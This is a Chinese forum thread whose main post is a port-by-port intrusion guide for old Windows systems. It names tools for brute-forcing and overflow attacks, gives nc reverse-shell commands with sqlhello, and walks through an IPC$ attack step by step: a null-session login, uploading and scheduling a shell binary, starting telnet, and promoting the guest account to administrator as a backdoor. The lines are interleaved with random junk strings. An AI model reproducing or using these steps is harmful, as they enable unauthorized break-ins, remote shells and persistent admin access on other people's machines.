返回列表 发帖

各个端口入侵详解

各个端口入侵详解
http://bbs.ylmf.com/read.php?tid=851329&u=1055888[/url]
1.135端口入侵 vd,L,3~/|  
可以用NT扫描器来扫描所要IP端 OPlQ(X*g  
扫出来用Recton2.5来开 3389或TELNET服务等等 I'AF0=hvf  
2.139端口入侵 {:5xkw  
着个端口主要是扫的弱口令,用扫端口的扫一段IP的139端口 tCXKbrz  
在用X-SCAN来批量扫描查弱口令

3. 1433端口入侵 D2md<Ad5o"  
scanport.exe 查有1433的机器 B.KRe[y  
SQLScanPas*.**e 进行字典暴破(字典是关键) 5y-E0 0"u  
最后 SQLTool*.**e入侵 RgPEu x  
m L> b  
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 D e19'.>  
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 "w*;v(M7w  
(以上反向的,测试成功) |Ev*1^k  
sqlhelloz.exe 入侵ip 1433 (这个是正向连接) M o(F.t,  
L;Fe&aLy  
4. 4899端口入侵 ThsnVyvBb  
用4899过滤器.exe,扫描空口令的机器 g:42`"em%  
n4;4F9(_  
5. 3899的入侵 G-*cAxV8  
对很早的机器,可以试试3389的溢出(win3389ex.exe) yS{LM"F $  
对2000的机器,可以试试字典暴破。(tscrack.exe) 9-X!b~k0Q  
*l=&qo  
6. 80入侵 5d4qO I>U  
对sp3以前的机器,可以用webdav入侵; Lv,Qw-:  
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) &l/ OPd3  
可以利用SQL进行注入。(啊D的注入软件)。 =YyOSz%G?  
CsWMl@  
7. serv-u入侵(21端口) CzG%UI  
对5. 004及以下系统,可用溢出入侵。(serv5004.exe) AT !% ~v  
对50.0及以下系统,可用本地提升权限。(servlocal.exe) EMwL(a  
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 8 m*72V  
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码 Q4Cq>T-)  
v)Ll`sJ `  
8. 554端口 ct+{G|P}  
用real554.exe入侵。 mO>|;GK!  
J/'oW]6K!  
9. 6129端口 0B2f+Tn,  
用DameWare6129.exe入侵。 aV^*(/.)  
Usfkocn7  
10. 系统漏洞 ]b3i FYi  
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, =NG$N;8  
进行溢出入侵。 @OG]d@ )5  
g(Hh)"{s  
11. 3127等端口 8v"aiq70  
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 r: F"^c+9  
'H7VvTB2  
12. 其他入侵 =@9 m:1g  
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。 mA%"}$  
+^='8(r]N  
-------------------------------------------------------------------------------------- b&r)EZgd  
经典IPC$入侵 N@xzDO!>z  
---------------------------------------------------------------------------------------- m]$Q J|  
1. C:>net use \127.0.0.1IPC$ "" /user:"admintitrators" gj,_ 'd!u  
这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连 ]hge  
{eNR60R>  
接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名 }* [-'6IF  

]5R5H_+  
,输入administrators,命令即可成功完成。 Pec]N  
   ^cpqPFgt  
2. C:>copy srv.exe \127.0.0.1admin$ NEeM(CP  
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的 Q9yL_1H0'  
nUB}b [j  
c:winntsystem32,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。 {cJrVdi(  
}/_~uA::i_  
=mHgmx1  
   *m W>dE  
3. C:>net time \127.0.0.1 {2$s9?,>6  
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。 IAE7-M S  
   xW]?gO8f  
4. C:>at \127.0.0.1 11:05 srv.exe (QQ^L`u9u"  
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊. e||!j 1  
   ;*!uBIM}  
5. C:>net time \127.0.0.1 8b(Flg  
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备 S(dxu6C$  
96d};1sh  
开始下面的命令。 UXEHzIU+  
   |)0 T}TYPp  
6. C:>telnet 127.0.0.1 99 6+EG/z  
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的 2PoC_2  
b"z@6Y{@  
是SRV在对方计算机中为我们建立一个99端口的Shell。 "z;`f0iJ  
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打 DaP"_Q  
nZmHb_fJB  
算建立一个Telnet服务!这就要用到ntlm了 +OKOh  
   VpO"0  
7.C:>copy ntlm.exe \127.0.0.1admin$ Ou{@W:$?w  
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。 hJ!M?VZL]  
   st4=G  
8. C:WINNTsystem32>ntlm ??L?*%  
输入ntlm启动(这里的C:WINNTsystem32>指的是对方计算机,运行ntlm其实是让这 P~9PG /J  
uL 5<:Og  
个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使 %%HG'z  
~ 81C ^&  
用"net start telnet"来开启Telnet服务! @*nuBBZ_  
F:5PM|Y  
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作 }4OKHZ4  
_]4fR4Kn4  
一样简单!(然后你想做什么?想做什么就做什么吧,哈哈) !p&/ .G  
,!;qqNk  
为了以防万一,我们再把guest激活加到管理组 S <Pg7c^  
10. C:>net user guest /active:yes '6rf~pY5  
将对方的Guest用户激活 #VkE% O*a  
'.?f ki  
11. C:>net user guest 1234 5FscDif  
将Guest的密码改为1234,或者你要设定的密码 M[HxHk-X*  
Lb+<up  
12. C:>net locaLGroup administrators guest /add s?6S %/Km  
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我 a4M+Z'#9  
G@@VWvEH  
们可以用guest再次访问这台计算机)

http://bbs.ylmf.com/read.php?tid=851329&u=1055888[/url]

TOP

http://bbs.ylmf.com/read.php?tid=851329&u=1055888[/url]
有详细解释一下就更好的啦  IPC$入侵 以前玩过

TOP

http://bbs.ylmf.com/read.php?tid=851329&u=1055888[/url]
有好多看不懂
不是乱码吧
不懂的

TOP

貌似乱码:lol :lol

TOP

干扰码哦~~~~~~~~~
Aim、Ambition、Action Security Team

Just For the Security . . . . . . .

The way to hacking. . . ■■■■■98%

TOP

返回列表